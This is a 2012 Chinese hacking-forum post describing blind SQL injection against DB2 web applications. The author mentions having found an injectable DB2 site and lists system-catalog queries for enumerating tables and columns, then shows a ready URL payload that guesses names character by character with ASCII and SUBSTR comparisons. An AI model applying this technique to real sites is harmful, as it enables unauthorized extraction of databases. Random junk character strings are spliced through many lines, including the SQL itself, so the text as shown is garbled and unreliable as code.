找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1865|回复: 0
打印 上一主题 下一主题

Sql Injection in DB2数据库

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:06:51 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
使用DB2的人比较少了,今天碰到了一个可供注入的DB2网站,想试试身手。不过在网上很难找到相关的资料,只好自己研究了。
3 Q3 t) P  C8 I& b参考了IBM DB2的文档,总结了这样几条:
  \3 Z3 a7 U% H1、select NAME from SYSIBM.SYSTABLES where CREATOR =USER & V* O+ `0 Y$ ], G9 w
可以返回系统中所有用户创建的表(table)名 % k4 G, C! ]8 I% L) U
2、select NAME from SYSIBM.SYSCOLUMNS where TBCREATOR = '' and TBNAME='' & E% U* u, n1 T) O
返回表中的列名 # }( L: k+ j( H' M  y
3、select NAME from SYSIBM.SYSTABLES where CREATOR =USER FETCH FIRST 1 ROWS ONLY
1 h; \& ]  M% Q这是最关键的地方,返回第一条记录,类似于sql server中的top 1
) I: J3 o$ w" K: z- z" h6 N0 R4、SUBSTR(string, position, length) 2 {9 I8 T$ V+ ^1 D
返回字符串子串的函数,类似于mid 9 z- ~& k: U- X" ^
5、ASCII()这个就不用多说了。
% z! `: F2 b8 ~# p4 }+ V( I% a有了这些语句和函数,我们就可以很方便的用ascii拆半法猜出所有的table名,字段名,以及其中的数据了。 # b2 ?/ J& B* ]- e, c% d
例如判断第一个table的名称的第一个字符的ascii码是否大于50: # `2 U3 F) s4 e# j9 j5 M( e
http://*.com?test.jsp?id=1 and (select ASCII(SUBSTR(NAME,1,1)) from SYSIBM.SYSTABLES where CREATOR =USER FETCH FIRST 1 ROWS ONLY)>50 -- 7 q: l5 C* S# @3 t. P2 v+ ~; b
: E! ?3 l) |) S# X. _! j
http://blog.waynedeng.com/blogview.asp?logID=543
5 f! K( N/ Q) ]: L, q
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表